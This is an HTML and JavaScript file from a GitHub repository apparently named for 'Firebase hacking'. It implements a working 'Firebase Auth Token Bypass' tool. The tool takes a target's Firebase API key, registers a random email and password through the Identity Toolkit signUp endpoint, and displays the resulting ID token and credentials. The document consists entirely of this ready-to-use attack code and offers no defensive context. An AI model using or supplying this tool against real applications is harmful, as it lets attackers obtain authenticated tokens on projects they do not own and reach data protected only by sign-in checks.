FirebaseHacking/index.html at main · Subhashis360/FirebaseHacking · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Firebase Auth Token Bypass</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body class="bg-light">
    <div class="container mt-5">
        <h2 class="text-center">Firebase Auth Token Bypass</h2>
        <form id="signupForm" class="card p-4">
            <div class="mb-3">
                <label for="apiKey" class="form-label">API Key</label>
                <input type="text" class="form-control" id="apiKey" required>
            </div>
            <button type="submit" class="btn btn-primary">Sign Up</button>
        </form>

        <div id="result" class="mt-4"></div>
    </div>

    <script>
        function generateRandomEmail() {
            const randomString = Math.random().toString(36).substring(2, 10);
            return `sm${randomString}@gmail.com`;
        }

        function generateRandomPassword() {
            const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()";
            let password = "";
            for (let i = 0; i < 12; i++) {
                password += chars.charAt(Math.floor(Math.random() * chars.length));
            }
            return password;
        }

        document.getElementById('signupForm').addEventListener('submit', async (event) => {
            event.preventDefault();

            const apiKey = document.getElementById('apiKey').value;
            const email = generateRandomEmail();
            const password = generateRandomPassword();

            const url = `https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=${apiKey}`;
            const data = {
                email: email,
                password: password,
                returnSecureToken: true
            };

            try {
                const response = await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data)
                });

                const result = await response.json();
                const resultDiv = document.getElementById('result');
                resultDiv.innerHTML = '';

                if (result.idToken) {
                    resultDiv.innerHTML = `
                        <div class="alert alert-success">
                            <h4>ID Token:</h4>
                            <textarea class="form-control" rows="5">${result.idToken}</textarea>
                            <h5 class="mt-3">Generated Credentials:</h5>
                            <p><b>Email:</b> ${email}</p>
                            <p><b>Password:</b> ${password}</p>
                        </div>`;
                } else {
                    resultDiv.innerHTML = `
                        <div class="alert alert-danger">Not possible: ${result.error?.message || 'Unknown error'}</div>`;
                }
            } catch (error) {
                document.getElementById('result').innerHTML = `
                    <div class="alert alert-danger">Request failed: ${error.message}</div>`;
            }
        });
    </script>
</body>
</html>